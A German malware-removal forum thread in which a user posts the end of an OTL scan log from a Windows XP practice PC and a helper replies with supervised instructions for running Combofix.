ActiveX: {870449CD-3975-D564-85AA-C85EFA6F2D59} - Browser Customizations
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install
ActiveX: {9309DD7E-EBFE-3C95-8B47-30D3A012F606} - .NET Framework
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {9F40156A-B9E2-D478-BED6-7E601939A61C} - Java (Sun)
ActiveX: {ACC563BC-4266-43f0-B6ED-9D38C4202C7E} - 
ActiveX: {B32FFD17-5A1A-4154-531B-F7BF1AC48E20} - Dynamic HTML-Datenbindung für Java
ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework
ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework
ActiveX: {C3C986D6-06B1-43BF-90DD-BE30756C00DE} - RevokedRootsUpdate
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {CC2A9BA0-3BDD-11D0-821E-444553540000} - Taskplaner
ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1
ActiveX: {D27CDB6E-AE6D-11cf-96B8-444553540000} - Shockwave Flash
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: {FD07AE75-71D9-D49B-988B-08F23554265F} - Microsoft Windows Media Player 6.4
ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE
 
NetSvcs: 6to4 -  File not found
NetSvcs: HidServ - %SystemRoot%\System32\hidserv.dll File not found
NetSvcs: Ias -  File not found
NetSvcs: Iprip -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: WmdmPmSp -  File not found
 
MsConfig - StartUpFolder: C:^Dokumente und Einstellungen^All Users^Startmenü^Programme^Autostart^Web Registration.lnk -  - File not found
MsConfig - StartUpReg: Adobe ARM - hkey= - key= - C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated)
MsConfig - StartUpReg: FreePDF Assistant - hkey= - key= - C:\Programme\FreePDF_XP\fpassist.exe (shbox.de)
MsConfig - StartUpReg: NeroFilterCheck - hkey= - key= -  File not found
MsConfig - StartUpReg: SunJavaUpdateSched - hkey= - key= - C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe (Sun Microsystems, Inc.)
MsConfig - State: "system.ini" - 0
MsConfig - State: "win.ini" - 0
MsConfig - State: "bootini" - 0
MsConfig - State: "services" - 0
MsConfig - State: "startup" - 2
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2012.10.25 00:45:21 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Dokumente und Einstellungen\TurboMed\Desktop\OTL.exe
[2012.10.19 13:32:02 | 000,000,000 | ---D | C] -- C:\WINDOWS\TMTemp
[2012.10.12 06:46:48 | 000,000,000 | ---D | C] -- C:\Programme\Mozilla Firefox
[2012.10.02 22:13:24 | 000,000,000 | R--D | C] -- C:\Dokumente und Einstellungen\TurboMed\Startmenü\Programme\Verwaltung
[2012.10.02 22:11:50 | 000,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2012.10.01 23:25:26 | 000,000,000 | ---D | C] -- C:\Bilder-Eingang
[3 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
File not found -- \\vmware-host\Shared Folders\Dokumente\new.jobx
File not found -- \\vmware-host\Shared Folders\Dokumente\Kolo-2.jpg
File not found -- \\vmware-host\Shared Folders\Dokumente\Kolo-1.jpg
File not found -- \\vmware-host\Shared Folders\Dokumente\index Kopie .html
File not found -- \\vmware-host\Shared Folders\Dokumente\hw32v423.exe
File not found -- \\vmware-host\Shared Folders\Dokumente\Default.rdp
File not found -- \\vmware-host\Shared Folders\Dokumente\Angebot CompuCare  AN-20120500287.pdf
[2012.10.25 02:47:18 | 000,053,536 | ---- | M] (G Data Software AG) -- C:\WINDOWS\System32\drivers\GDTdiIcpt.sys
[2012.10.25 02:47:17 | 000,093,728 | ---- | M] (G Data Software AG) -- C:\WINDOWS\System32\drivers\MiniIcpt.sys
[2012.10.25 02:47:16 | 000,041,888 | ---- | M] (G Data Software AG) -- C:\WINDOWS\System32\drivers\GDBehave.sys
[2012.10.25 02:21:08 | 000,838,146 | ---- | M] () -- C:\WINDOWS\System32\sig.bin
[2012.10.25 02:21:08 | 000,045,257 | ---- | M] () -- C:\WINDOWS\System32\nmp.map
[2012.10.25 00:45:29 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Dokumente und Einstellungen\TurboMed\Desktop\OTL.exe
[2012.10.24 22:26:48 | 000,000,405 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\VMware Shared Folders.lnk
[2012.10.23 23:41:12 | 000,000,211 | -HS- | M] () -- C:\boot.ini
[2012.10.23 23:19:14 | 000,013,646 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2012.10.23 23:17:46 | 000,000,761 | ---- | M] () -- C:\WINDOWS\HPW5DSM.INI
[2012.10.23 23:17:15 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2012.10.19 19:35:42 | 000,015,364 | -H-- | M] () -- \\vmware-host\Shared Folders\Dokumente\.DS_Store
[2012.10.19 14:30:10 | 000,000,031 | ---- | M] () -- C:\AUTOEXEC.BAT
[2012.10.19 14:29:13 | 000,001,506 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\TurboMed.lnk
[2012.10.19 13:43:42 | 000,001,544 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\ifap praxisCENTER 3.lnk
[2012.10.19 13:38:30 | 000,792,978 | ---- | M] () -- C:\Dokumente und Einstellungen\TurboMed\Desktop\Lizenzurkunde.pdf
[2012.10.11 12:13:52 | 000,002,311 | ---- | M] () -- C:\WINDOWS\HPW5CSS.INI
[2012.10.11 12:05:42 | 001,184,549 | ---- | M] () -- C:\Dokumente und Einstellungen\TurboMed\Desktop\2012-08-24_TM-Lizenzbestellung_TM_v2.0.pdf
[2012.10.11 03:02:14 | 000,001,393 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[3 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2012.10.19 13:38:27 | 000,792,978 | ---- | C] () -- C:\Dokumente und Einstellungen\TurboMed\Desktop\Lizenzurkunde.pdf
[2012.10.11 12:05:42 | 001,184,549 | ---- | C] () -- C:\Dokumente und Einstellungen\TurboMed\Desktop\2012-08-24_TM-Lizenzbestellung_TM_v2.0.pdf
[2012.09.04 01:50:10 | 000,000,000 | ---- | C] () -- C:\Dokumente und Einstellungen\TurboMed\debug.off
[2012.08.16 02:10:27 | 000,000,023 | ---- | C] () -- C:\WINDOWS\GSWINFAX.INI
[2012.05.31 21:05:10 | 000,222,002 | ---- | C] () -- C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\WPFFontCache_v0400-S-1-5-21-1935655697-507921405-1801674531-500-0.dat
[2012.05.31 12:29:28 | 000,222,002 | ---- | C] () -- C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\WPFFontCache_v0400-S-1-5-21-1935655697-507921405-1801674531-1006-0.dat
[2012.05.31 12:29:28 | 000,150,142 | ---- | C] () -- C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\WPFFontCache_v0400-System.dat
[2012.05.24 01:51:41 | 000,024,064 | ---- | C] () -- C:\Dokumente und Einstellungen\TurboMed\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012.05.04 14:48:45 | 000,116,224 | ---- | C] () -- C:\WINDOWS\System32\redmonnt.dll
[2012.05.04 14:48:45 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\unredmon.exe
[2012.04.26 01:20:04 | 000,837,090 | ---- | C] () -- C:\WINDOWS\System32\sig.bin
[2012.04.25 21:08:33 | 000,004,078 | ---- | C] () -- C:\WINDOWS\jaeger.ini
[2012.04.25 21:08:33 | 000,000,461 | ---- | C] () -- C:\WINDOWS\ergoscan.ini
[2012.04.25 21:08:32 | 000,097,072 | ---- | C] () -- C:\WINDOWS\System32\BWCC0007.DLL
[2012.04.25 21:08:32 | 000,096,928 | ---- | C] () -- C:\WINDOWS\System32\BWCC000C.DLL
[2012.04.25 20:50:36 | 000,000,503 | ---- | C] () -- C:\WINDOWS\System32\HPANT.DAT
[2012.04.25 20:49:26 | 000,002,311 | ---- | C] () -- C:\WINDOWS\HPW5CSS.INI
[2012.04.25 20:49:26 | 000,000,761 | ---- | C] () -- C:\WINDOWS\HPW5DSM.INI
[2012.04.25 02:15:58 | 000,000,027 | ---- | C] () -- C:\WINDOWS\BarCode.ini
[2012.04.25 00:12:49 | 001,843,200 | ---- | C] () -- C:\WINDOWS\System32\ltmm_n.dll
[2012.04.25 00:12:41 | 000,068,096 | ---- | C] () -- C:\WINDOWS\System32\lfplt11n.dll
[2012.04.25 00:01:02 | 000,000,106 | ---- | C] () -- C:\WINDOWS\GSAUF.INI
[2012.04.24 20:00:31 | 000,120,832 | ---- | C] () -- C:\WINDOWS\System32\gsbest32.dll
[2012.04.24 02:17:45 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2012.04.24 02:11:23 | 000,004,448 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2012.04.24 02:09:49 | 000,147,608 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2012.04.24 01:57:29 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2012.04.24 01:51:26 | 000,021,740 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
 
========== ZeroAccess Check ==========
 
[2012.04.24 11:55:07 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shdocvw.dll -- [2012.02.28 20:49:18 | 001,510,400 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\system32\wbem\fastprox.dll -- [2009.02.09 12:51:44 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = C:\WINDOWS\system32\wbem\wbemess.dll -- [2008.04.14 14:00:00 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2012.06.08 11:20:23 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Autodesk
[2012.04.25 23:33:46 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\G DATA
[2012.05.29 02:37:33 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\ISDNWatch
[2012.06.07 19:35:08 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\NokiaInstallerCache
[2012.05.04 15:49:31 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Sage
[2012.06.05 10:32:51 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\SqlBackupAndFtp
[2012.06.19 23:19:04 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\StarMoney 8.0
[2012.09.04 02:16:40 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP
[2012.07.11 16:34:15 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\AKVIS LLC
[2012.05.29 22:11:20 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Applian FLV and Media Player
[2012.06.08 11:20:24 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Autodesk
[2012.05.17 14:50:14 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\CadSoft
[2012.10.25 02:38:37 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Dropbox
[2012.10.25 02:45:51 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\FileZilla
[2012.09.12 19:20:52 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\FRITZ!
[2012.05.23 13:15:22 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\JGsoft
[2012.06.01 01:40:13 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Oracle
[2012.06.08 13:44:50 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\TeamViewer
[2012.06.21 00:10:26 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Thunderbird
[2012.05.16 01:26:07 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Xerox
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %SYSTEMDRIVE%\*. >
[2012.10.23 01:30:04 | 000,000,000 | ---D | M] -- C:\1. zu senden
[2012.04.25 18:57:57 | 000,000,000 | ---D | M] -- C:\1c859c601ea609d110f71afab2
[2012.05.14 20:19:31 | 000,000,000 | ---D | M] -- C:\46e14523b9422fbbca4578a9ed6e06
[2012.05.14 21:40:53 | 000,000,000 | ---D | M] -- C:\4f05e72e25865a7165fd21b98b2ad1dd
[2012.05.30 10:20:27 | 000,000,000 | ---D | M] -- C:\Autodesk
[2012.10.09 01:04:37 | 000,000,000 | ---D | M] -- C:\Bilder-Eingang
[2012.04.25 09:20:18 | 000,000,000 | ---D | M] -- C:\d6b48e5bc01f7fd28ee2cfebbec612
[2012.05.16 01:05:41 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen
[2012.10.25 02:42:45 | 000,000,000 | ---D | M] -- C:\Downloads
[2012.04.25 09:21:35 | 000,000,000 | ---D | M] -- C:\fcbd87b053ed04071a24e35f76
[2012.10.19 19:37:44 | 000,000,000 | ---D | M] -- C:\gdt
[2012.09.20 17:48:17 | 000,000,000 | ---D | M] -- C:\GSWINSQL
[2012.04.24 23:04:39 | 000,000,000 | ---D | M] -- C:\GSWINSQL.old
[2012.04.26 01:44:00 | 000,000,000 | ---D | M] -- C:\GSWINSQL2007
[2012.04.25 20:49:37 | 000,000,000 | ---D | M] -- C:\HPW5
[2012.10.19 13:43:41 | 000,000,000 | ---D | M] -- C:\ifapDB
[2012.04.25 21:08:33 | 000,000,000 | ---D | M] -- C:\lab4
[2012.04.24 22:38:40 | 000,000,000 | ---D | M] -- C:\MSDERelA
[2012.04.25 19:11:51 | 000,000,000 | RH-D | M] -- C:\MSOCache
[2012.10.19 19:33:12 | 000,000,000 | ---D | M] -- C:\patpanel
[2012.10.13 17:48:37 | 000,000,000 | R--D | M] -- C:\Programme
[2012.05.16 01:35:34 | 000,000,000 | -HSD | M] -- C:\RECYCLER
[2012.04.27 19:35:20 | 000,000,000 | ---D | M] -- C:\Sicherung
[2012.04.24 22:24:29 | 000,000,000 | ---D | M] -- C:\SQL2KSP4
[2012.04.24 22:10:34 | 000,000,000 | ---D | M] -- C:\SQLEVAL
[2012.10.23 03:04:02 | 000,000,000 | -HSD | M] -- C:\System Volume Information
[2012.06.30 14:23:45 | 000,000,000 | ---D | M] -- C:\Tools
[2012.10.19 19:15:21 | 000,000,000 | ---D | M] -- C:\TurboMed
[2012.10.23 23:19:13 | 000,000,000 | ---D | M] -- C:\WINDOWS
 
< %PROGRAMFILES%\*.exe >
Invalid Environment Variable: LOCALAPPDATA
 
< %systemroot%\*. /mp /s >
 
< C:\Windows\system32\*.tsp >
[2008.04.14 14:00:00 | 000,266,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\h323.tsp
[2008.04.14 14:00:00 | 000,029,696 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp
[2008.04.14 14:00:00 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ipconf.tsp
[2008.04.14 14:00:00 | 000,033,280 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp
[2008.04.14 14:00:00 | 000,057,344 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp
[2008.04.14 14:00:00 | 000,076,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp
[2008.04.14 14:00:00 | 000,207,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp
[1 C:\Windows\system32\*.tmp files -> C:\Windows\system32\*.tmp -> ]
[2012.04.24 01:53:17 | 000,000,065 | RH-- | C] () -- C:\WINDOWS\Tasks\desktop.ini
[2012.04.24 01:58:06 | 000,000,006 | -H-- | C] () -- C:\WINDOWS\Tasks\SA.DAT
 
< MD5 for: AGP440.SYS  >
[2008.04.14 14:00:00 | 020,108,202 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys
[2008.04.14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\AGP440.SYS
 
< MD5 for: ATAPI.SYS  >
[2008.04.14 14:00:00 | 020,108,202 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2008.04.14 14:00:00 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
 
< MD5 for: EVENTLOG.DLL  >
[2008.04.14 14:00:00 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\system32\dllcache\eventlog.dll
[2008.04.14 14:00:00 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\system32\eventlog.dll
 
< MD5 for: EXPLORER.EXE  >
[2008.04.14 14:00:00 | 001,036,800 | ---- | M] (Microsoft Corporation) MD5=418045A93CD87A352098AB7DABE1B53E -- C:\WINDOWS\explorer.exe
[2008.04.14 14:00:00 | 001,036,800 | ---- | M] (Microsoft Corporation) MD5=418045A93CD87A352098AB7DABE1B53E -- C:\WINDOWS\system32\dllcache\explorer.exe
 
< MD5 for: NETLOGON.DLL  >
[2008.04.14 14:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=0098D35F91DEAB9C127360A877F2CF84 -- C:\WINDOWS\system32\dllcache\netlogon.dll
[2008.04.14 14:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=0098D35F91DEAB9C127360A877F2CF84 -- C:\WINDOWS\system32\netlogon.dll
 
< MD5 for: SCECLI.DLL  >
[2008.04.14 14:00:00 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\system32\dllcache\scecli.dll
[2008.04.14 14:00:00 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\system32\scecli.dll
 
< MD5 for: USER32.DLL  >
[2008.04.14 14:00:00 | 000,580,096 | ---- | M] (Microsoft Corporation) MD5=B0050CC5340E3A0760DD8B417FF7AEBD -- C:\WINDOWS\system32\dllcache\user32.dll
[2008.04.14 14:00:00 | 000,580,096 | ---- | M] (Microsoft Corporation) MD5=B0050CC5340E3A0760DD8B417FF7AEBD -- C:\WINDOWS\system32\user32.dll
 
< MD5 for: USERINIT.EXE  >
[2008.04.14 14:00:00 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\system32\dllcache\userinit.exe
[2008.04.14 14:00:00 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\system32\userinit.exe
 
< MD5 for: WINLOGON.EXE  >
[2008.04.14 14:00:00 | 000,513,024 | ---- | M] (Microsoft Corporation) MD5=F09A527B422E25C478E38CAA0E44417A -- C:\WINDOWS\system32\dllcache\winlogon.exe
[2008.04.14 14:00:00 | 000,513,024 | ---- | M] (Microsoft Corporation) MD5=F09A527B422E25C478E38CAA0E44417A -- C:\WINDOWS\system32\winlogon.exe
 
< MD5 for: WS2IFSL.SYS  >
[2008.04.14 14:00:00 | 000,012,032 | ---- | M] (Microsoft Corporation) MD5=6ABE6E225ADB5A751622A9CC3BC19CE8 -- C:\WINDOWS\system32\dllcache\ws2ifsl.sys
[2008.04.14 14:00:00 | 000,012,032 | ---- | M] (Microsoft Corporation) MD5=6ABE6E225ADB5A751622A9CC3BC19CE8 -- C:\WINDOWS\system32\drivers\ws2ifsl.sys
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\System32\config\*.sav >
[2012.04.24 03:09:23 | 000,094,208 | ---- | M] () -- C:\WINDOWS\System32\config\default.sav
[2012.04.24 03:09:23 | 001,089,536 | ---- | M] () -- C:\WINDOWS\System32\config\software.sav
[2012.04.24 03:09:23 | 000,503,808 | ---- | M] () -- C:\WINDOWS\System32\config\system.sav
 
< %systemroot%\system32\*.dll /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]
 
< %USERPROFILE%\*.* >
[2012.09.04 01:50:10 | 000,000,000 | ---- | M] () -- C:\Dokumente und Einstellungen\TurboMed\debug.off
[2012.10.25 02:00:30 | 006,291,456 | -H-- | M] () -- C:\Dokumente und Einstellungen\TurboMed\NTUSER.DAT
[2012.10.25 06:18:17 | 000,001,024 | -H-- | M] () -- C:\Dokumente und Einstellungen\TurboMed\ntuser.dat.LOG
[2012.10.12 20:35:26 | 000,000,190 | -HS- | M] () -- C:\Dokumente und Einstellungen\TurboMed\ntuser.ini
[2012.09.04 01:51:56 | 000,141,082 | ---- | M] () -- C:\Dokumente und Einstellungen\TurboMed\xml-rpc.log
 
< %USERPROFILE%\Local Settings\Temp\*.exe >
 
< %USERPROFILE%\Local Settings\Temp\*.dll >
 
< %USERPROFILE%\Application Data\*.exe >
 
< HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Kmode: %SystemRoot%\system32\win32k.sys [2012.07.03 20:25:08 | 001,866,240 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 48 bytes -> C:\Dokumente und Einstellungen\All Users\DRM:احتضان
@Alternate Data Stream - 123 bytes -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:810B9F0D

< End of report >
--- --- ---
__________________
Alt 29.10.2012, 20:28   #4
markusg
/// Malware-holic
 
Windows entwickelt merkwürdiges Eigenleben - Standard

Windows entwickelt merkwürdiges Eigenleben


Combofix darf ausschließlich ausgeführt werden, wenn dies von einem Team Mitglied angewiesen wurde!
Es sollte nie auf eigene Initiative hin ausgeführt werden! Eine falsche Benutzung kann ernsthafte Computerprobleme nach sich
ziehen und eine Bereinigung der Infektion noch erschweren.
Downloade dir bitte Combofix von einem dieser Downloadspiegel

Link 1
Link 2


WICHTIG - Speichere Combofix auf deinem Desktop
  • Deaktiviere bitte all deine Anti Viren sowie Anti Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören.
Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.

Wenn Combofix fertig ist, wird es eine Logfile erstellen. Bitte poste die C:\Combofix.txt in deiner nächsten Antwort.


Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Zitat:
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Antwort

Themen zu Windows entwickelt merkwürdiges Eigenleben
acrobat, datei, dateiname, dateinamen, eigenleben, explorer.exe, folge, folgendes, ftp, hijack, hijackthis, laufe, leben, merkwürdiges, nichts, programm, reader, selbstständig, trägt, ukraine, wickel, windows, windows e, öffnen, öffnet


« SweetPcFix | email link Malware Funde Heur.PE@4294967295, Malware@#nwdk01o66rpro, Malware@#2x6qrvr63cjrw »


Ähnliche Themen: Windows entwickelt merkwürdiges Eigenleben


  1. Trusted Computing: Bundesregierung entwickelt Position weiter
    Nachrichten - 13.11.2015 (0)
  2. Merkwürdiges Problem mit Windows-Fenstern
    Plagegeister aller Art und deren Bekämpfung - 07.06.2015 (19)
  3. c't entwickelt datenschutzfreundliche Social-Media-Buttons weiter
    Nachrichten - 28.11.2014 (0)
  4. Mauszeiger entwickelt Eigenleben
    Plagegeister aller Art und deren Bekämpfung - 31.10.2014 (9)
  5. Windows 7 Media Player mit Eigenleben
    Log-Analyse und Auswertung - 11.06.2014 (14)
  6. Windows 8.1 Lenovo Laptop und sein Eigenleben
    Log-Analyse und Auswertung - 26.04.2014 (3)
  7. Nation-Zoom eingefangen: PC entwickelt Eigenleben
    Plagegeister aller Art und deren Bekämpfung - 27.12.2013 (8)
  8. Windows 7: merkwürdiges Verhalten (Prozesse beenden sehr langsam, Bildschirmflackern, seltsame Internetverbindung)
    Log-Analyse und Auswertung - 22.11.2013 (7)
  9. Merkwürdiges Verhalten bei Laptop-Benutzung im Hotel - Windows Update
    Plagegeister aller Art und deren Bekämpfung - 18.05.2013 (0)
  10. Email gehackt und merkwürdiges windows update mit Registryänderung?
    Log-Analyse und Auswertung - 08.03.2013 (27)
  11. Merkwürdiges Problem unter Windows XP
    Alles rund um Windows - 24.10.2012 (1)
  12. Online-Banking-Trojaner entwickelt sich rasant weiter
    Nachrichten - 20.01.2011 (0)
  13. Jailbreak-Community entwickelt eigenen iPhone-Patch
    Nachrichten - 12.08.2010 (0)
  14. Eigenleben
    Plagegeister aller Art und deren Bekämpfung - 03.07.2009 (4)
  15. Eigenleben
    Log-Analyse und Auswertung - 15.07.2007 (8)
  16. Nerviges Eigenleben....!
    Log-Analyse und Auswertung - 31.01.2006 (10)
  17. Mauszeiger entwickelt Eigenleben??
    Log-Analyse und Auswertung - 07.01.2006 (1)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


